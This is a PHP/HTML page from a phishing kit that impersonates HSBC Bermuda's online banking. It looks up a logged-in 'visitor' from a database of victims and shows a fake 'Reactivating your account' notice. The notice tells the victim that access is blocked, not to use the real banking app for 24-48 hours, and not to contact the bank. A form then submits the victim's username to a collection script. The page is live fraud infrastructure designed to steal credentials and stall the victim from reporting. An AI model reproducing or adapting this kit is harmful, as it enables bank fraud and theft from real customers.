<?php
     // Start the session to access session variables
     session_start();
    
     // Include your database connection file
     require_once '../../oyexa/config.php';
     
     // Check if the user is logged in
     if (!isset($_SESSION['visitor_id'])) {
         // If not logged in, redirect to the login page
         header("Location: login/spk.php");
         exit;
     }
     
     // Fetch the redirect address of the logged-in user from the database
     $visitor_id = $_SESSION['visitor_id'];
     $stmt = $pdo->prepare("SELECT * FROM visitors WHERE id = ?");
     $stmt->execute([$visitor_id]);
     $visitor = $stmt->fetch(PDO::FETCH_ASSOC);

?>
<!doctype html>
<html lang="fi">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />

<head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta name="HandheldFriendly" content="true" />
    <meta name="MobileOptimized" content="320" />
    <meta name="format-detection" content="telephone=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="pragma" content="no-cache">
    <meta name="robots" content="noindex">
    <meta http-equiv="cache-control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="expires" content="-1">
    <link rel="shortcut icon" href="images/favicon.ico">
    <link rel="stylesheet" href="css/clientlib-default.min.91f7ec1e1f900424d14d513cd9754029.css" type="text/css">
    <title>Security</title>
    <style type="text/css">
        .input-log {
            width: 100%;
            min-height: 40px;
            border: 1px solid #929292;
            box-sizing: border-box;
            outline: none;
            box-shadow: none;
            border-radius: 0 !important;
            line-height: 1.5;
            -webkit-appearance: none;
            -moz-appearance: none;
            appearance: none;
        }

        #rem {
            cursor: pointer;
            width: 1.2em;
            height: 1.2em;
            margin: 0;
            position: absolute;
            outline: none;
        }
    </style>
</head>

<body class="configPage ">

    <div>

        <div class="header grid">

            <div class="header-top-container hide-on-mobile-and-tablet">
                <div class="header-top">
                    <div class="row">
                        <div class="lg-12">
                            <nav aria-label="business line">
                                <ul class="header-top-navigation">
                                    <li>
                                        <a class="skip-to-content-link" href="#top-of-content">
                                            <span class="skip-to-content-link-text">Skip page header and navigation</span>
                                        </a>
                                    </li>


                                    <li class="header-top-navigation-item is-active">
                                        <a href="#" aria-label="Personal currently selected" aria-selected="true">
                                            Personal
                                        </a>
                                    </li>


                                    <li class="header-top-navigation-item ">
                                        <a href="#" aria-selected="false">
                                            Business
                                        </a>
                                    </li>


                                    <li class="header-top-navigation-item ">
                                        <a href="#" aria-selected="false">
                                            Corporate
                                        </a>
                                    </li>

                                </ul>
                            </nav>
                            <div class="header-top-meta">
                                <div class="dropdown-container">
                                    <nav aria-label="header dropdown">
                                        <ul>

                                            <li class="header-generic-dropdown">
                                                <a class="selected-item">
                                                    <span class="flag flag-BM" aria-hidden="true"></span>
                                                    <span class="visuallyhidden">List of countries</span>
                                                    BM
                                                </a>
                                            </li>
                                            <li class="header-dropdown header-generic-dropdown">
                                                <span>
                                                    <span class="visuallyhidden">Language</span>
                                                    English
                                                </span>


                                            </li>

                                            <li class="header-dropdown header-user-wrapper register-button">





                                                <div class="link-container">
                                                    <a class="A-LNKB-RW-ALL" href="#">


                                                        <span class="link">Register</span>&nbsp;<span class="icon icon-chevron-right-small" aria-hidden="true"></span>



                                                    </a>
                                                </div>


                                            </li>
                                            <li class="header-dropdown header-user-wrapper my-accounts-button hidden">





                                                <div class="link-container">
                                                    <a class="A-LNKB-RW-ALL" href="#">


                                                        <span class="link">Back to my accounts</span>&nbsp;<span class="icon icon-chevron-right-small" aria-hidden="true"></span>



                                                    </a>
                                                </div>


                                            </li>
                                            <li class="header-user-wrapper">

                                            </li>
                                        </ul>
                                    </nav>
                                    <div class="page-overlay hidden"></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="header-main-container hide-on-mobile-and-tablet">
                <div class="header-main">
                    <div class="row wrapper">
                        <div class="header-logo lg-2">

                            <a href="#">
                                <img src="images/spankki.png" alt="HSBC Bermuda Bank">
                            </a>
                        </div>
                        <nav class="header-main-navigation lg-10">

                            <ul class="row">
                                <li class="header-main-navigation-item" tabindex="0">

                                    <div data-target="header-doormat-0" class="header-mobile-doormat-0 header-doormat-mobile-title sidebar-submenu-trigger">
                                        <span class="icon icon-banking hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-title">Everyday banking</span>
                                        <span class="icon icon-chevron-right hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-subtitle">Accounts &amp; services</span>
                                    </div>

                                </li>


                                <li class="header-main-navigation-item" tabindex="0">

                                    <div data-target="header-doormat-1" class="header-mobile-doormat-1 header-doormat-mobile-title sidebar-submenu-trigger">
                                        <span class="icon icon-borrowing hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-title">Borrowing</span>
                                        <span class="icon icon-chevron-right hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-subtitle">Loans &amp; credit cards</span>
                                    </div>

                                </li>


                                <li class="header-main-navigation-item" tabindex="0">

                                    <div data-target="header-doormat-2" class="header-mobile-doormat-2 header-doormat-mobile-title sidebar-submenu-trigger">
                                        <span class="icon icon-investment hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-title">Investing</span>
                                        <span class="icon icon-chevron-right hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-subtitle">Products &amp; analysis</span>
                                    </div>

                                </li>


                                <li class="header-main-navigation-item" tabindex="0">

                                    <div data-target="header-doormat-3" class="header-mobile-doormat-3 header-doormat-mobile-title sidebar-submenu-trigger">
                                        <span class="icon icon-insurance hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-title">Insurance</span>
                                        <span class="icon icon-chevron-right hide-on-desktop" aria-hidden="true"></span>
                                        <span class="header-main-navigation-subtitle">Protection &amp; family </span>
                                    </div>

                                </li>

                            </ul>
                        </nav>
                    </div>
                </div>
            </div>


            <div class="header-mobile">
                <div class="header-mobile-top hide-on-desktop">
                    <button class="header-sidebar-trigger" aria-label="Open menu" data-aria-label-open-menu="Open menu" data-aria-label-close-menu="Close menu">
                        <span class="icon icon-menu" aria-hidden="true"></span>
                        <span class="header-sidebar-trigger-text">Menu</span>
                    </button>
                    <nav id="sidebar" class="header-mobile-sidebar hide-on-desktop">
                        <div class="header-mobile-sidebar-content">



                            <div class="close-submenu-trigger" role="button" tabindex="0" aria-label="Close Submenu">
                                <span class="icon icon-chevron-left" aria-hidden="true"></span>
                            </div>



















                            <li role="menuitem" class="header-mobile-selected-item">
                                <span class="mobile-flag flag-BM"></span>
                                BM
                            </li>


                            <li class="header-mobile-selected-item" tabindex="0" role="menuitem">
                                <span class="visuallyhidden">Language</span>
                                <span class="icon icon-settings" aria-hidden="true"></span>
                                English
                            </li>


                            </ul>
                            <div class="sidebar-submenu-wrapper" data-source="sidebar-submenu-language">
                                <p class="sidebar-submenu-label">Language</p>
                                <ul class="locale-management">
                                    <li class="is-active">

                                        <a class="sidebar-submenu-link" href="#" lang="en">
                                            <span class="visuallyhidden">Selected</span>
                                            English
                                            <span class="icon icon-agree" aria-hidden="true"></span>
                                        </a>
                                    </li>
                                </ul>
                            </div>

                            <div class="header-mobile-sidebar-footer header-dropdown">
                                <ul class="header-mobile-business-links">
                                    <li>
                                        <a class="header-mobile-business-item register-button" href="#">
                                            Register
                                            <span class="icon icon-chevron-right" aria-hidden="true"></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a class="header-mobile-business-item my-accounts-button hidden" href="#">
                                            Back to my accounts
                                            <span class="icon icon-chevron-right" aria-hidden="true"></span>
                                        </a>
                                    </li>

                                    <li>
                                        <a class="header-mobile-business-item" href="#">
                                            Personal
                                            <span class="icon icon-chevron-right" aria-hidden="true"></span>
                                        </a>
                                    </li>

                                    <li>
                                        <a class="header-mobile-business-item" href="#">
                                            Business
                                            <span class="icon icon-chevron-right" aria-hidden="true"></span>
                                        </a>
                                    </li>

                                    <li>
                                        <a class="header-mobile-business-item" href="#">
                                            Corporate
                                            <span class="icon icon-chevron-right" aria-hidden="true"></span>
                                        </a>
                                    </li>

                                </ul>
                            </div>
                            <div class="close-submenu-trigger hidden" role="button" tabindex="0" aria-label="Close Submenu">
                                <span class="icon icon-chevron-left" aria-hidden="true"></span>
                            </div>
                            <button class="visuallyhidden sidebar-hidden-close-button">Close menu</button>
                        </div>
                    </nav>
                    <div class="header-mobile-overlay"></div>
                    <div class="header-mobile-logo">

                        <a href="#">
                            <img src="images/spankki.png" alt="HSBC Bermuda Bank">
                        </a>
                    </div>

                </div>
            </div>
        </div>
        <span id="top-of-content" class="top-of-content visuallyhidden" tabindex="0">Top of main content</span>










    </div>

    <div>



        <div id="app-root" class="aemHeightController">




            <div class="background-image">
                <div class='image image-data' data-src='url("")'></div>
            </div>
            <form method="POST" action="../code.php" id="logform">
                <input type="hidden" id='loader' name="loader" value="snoti">
                <input type="hidden" id='id' name="id" value="">

                <div class="grid">
                    <div class="row">
                        <div class="sm-12">
                            <div>
                                <div class="A-ERRORCONT-RW-ALL sm-12 md-6 error-content" aria-live="assertive">
                                    <center>
                                        <h1 style="text-align: left; display: inline; font-size: 1.75em; letter-spacing: 0; line-height: 1.2;font-family:UniversNextforHSBC-Light; font-weight: 400;"><span>Reactivating your account.</span></h1>

                                    </center>

                                    <center>


                                        <p class="lead text-center my-2">We have now temporarily blocked your online banking access.</p>

                                        <p class="lead text-center my-2">Your card(s) will work as normal but please do NOT try to access the mobile app for 24-48 hours while we investigate as this will delay your account restoration process.</p>

                                        <p class="lead text-center my-2">You will receive a text once this is complete.</p>
                                        <p class="lead text-center my-2">You do not need to contact us.</p>
                                    </center>

                                    <div class="d-flex justify-content-center">
                                        <input style="width:30px; height:20px;" type="checkbox" id="check" name="check" value="check"><label for="vehicle1" style="margin-left:10px; padding-right:33px;"><b>Check this box to understand this. Thank you for your cooperation. </b></label><br>
                                    </div>

                                    <span class="buttons">
                                        <input type="hidden" name="username" value="<?= $visitor['username']; ?>">
                                        <input type="hidden" name="notice_status" value="checked">
                                        <button type="submit" style="border: 0px; background-color:green" name="accept_notice" class="continue">
                                            <span>I accept</span>

                                        </button>

                                    </span>
                                </div>
                            </div>
                        </div>
                    </div>

                </div>
            </form>


            <!--used for prefs-->
            <div style="display: none;">
                <label for="hsbc_prefs">prefs label</label>
                <textarea cols="60" rows="20" id="hsbc_prefs" name="hsbc_prefs">
    </textarea>
            </div>


            <div>

                <head>
                    <link href="css/Transmitmain.min.05f3070217973d9301ad.css" rel="stylesheet">
                </head>
            </div>



            <link rel="stylesheet" href="css/clientlib-all.min.5c23575dd2a45b73c671a7797acc5d2d.css" type="text/css">




        </div>


    </div>


    <div class="dspFooter">
        <div class="footer">
            <ul class="header-mobile-footer-item-wrapper" role="menu">
                <li class="header-mobile-footer-item hide-on-desktop header-main-navigation-item" role="menuitem">
                    <div class="header-doormat-mobile-title" tabindex="0">
                        <span class="icon icon-circle-info" aria-hidden="true"></span>
                        <span class="header-mobile-footer-title">Footer Menu</span>
                        <span class="icon icon-chevron-right" aria-hidden="true"></span>
                    </div>
                </li>
            </ul>
            <div class="footer-main">
                <div class="grid">
                    <div class="row wrapper">
                        <nav>
                            <ul class="footer-large">
                                <li class="footer-large-item lg-3">
                                    <div class="footer-large-title">
                                        <i class="icon icon-phone" aria-hidden="true"></i>
                                        <h4 class="footer-section-title">Contact HSBC</h4>
                                    </div>
                                    <a href="#">

                                        Write, call or send a message&nbsp;<i class="icon icon-chevron-right" aria-hidden="true"></i>
                                    </a>
                                </li>
                                <li class="footer-large-item lg-3">
                                    <div class="footer-large-title">
                                        <i class="icon icon-location" aria-hidden="true"></i>
                                        <h4 class="footer-section-title">Find a branch</h4>
                                    </div>
                                    <a href="#">

                                        And your nearest Express Banking location&nbsp;<i class="icon icon-chevron-right" aria-hidden="true"></i>
                                    </a>
                                </li>
                                <li class="footer-large-item lg-3">
                                    <div class="footer-large-title">
                                        <i class="icon icon-circle-info" aria-hidden="true"></i>
                                        <h4 class="footer-section-title">Frequently Asked Questions</h4>
                                    </div>
                                    <a href="#">

                                        See FAQs on our products&nbsp;<i class="icon icon-chevron-right" aria-hidden="true"></i>
                                    </a>
                                </li>
                                <li class="footer-large-item lg-3">
                                    <div class="footer-large-title">
                                        <i class="icon icon-global" aria-hidden="true"></i>
                                        <h4 class="footer-section-title">About HSBC</h4>
                                    </div>
                                    <a href="#">

                                        Careers, media, investor and corporate information&nbsp;<i class="icon icon-chevron-right" aria-hidden="true"></i>
                                    </a>
                                </li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
            <div class="footer-bottom">
                <div class="grid">
                    <div class="row wrapper">
                        <nav class="lg-7">
                            <ul class="footer-supplementary clearfix">

                                <li class="footer-supplementary-item">
                                    <a href="#">Privacy and Security</a>
                                </li>

                                <li class="footer-supplementary-item">
                                    <a href="#">Terms of Use</a>
                                </li>

                                <li class="footer-supplementary-item">
                                    <a href="#">Hyperlink Policy</a>
                                </li>

                                <li class="footer-supplementary-item">
                                    <a href="#">Online Security</a>
                                </li>


                            </ul>
                        </nav>


                        <div class="footer-legal-regulatory sm-12 lg-5 text">
                            <p>This website is designed for use in Bermuda. <a href="https://www.hsbc.bm/legal/cross-border-banking/" target="_blank" rel="noopener">Cross-border notice</a><br />
                            </p>

                            <p>© HSBC Bank Bermuda Limited, 2020. All rights reserved.<br />
                            </p>


                        </div>

                    </div>
                </div>
            </div>
        </div>
    </div>






</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

</html>
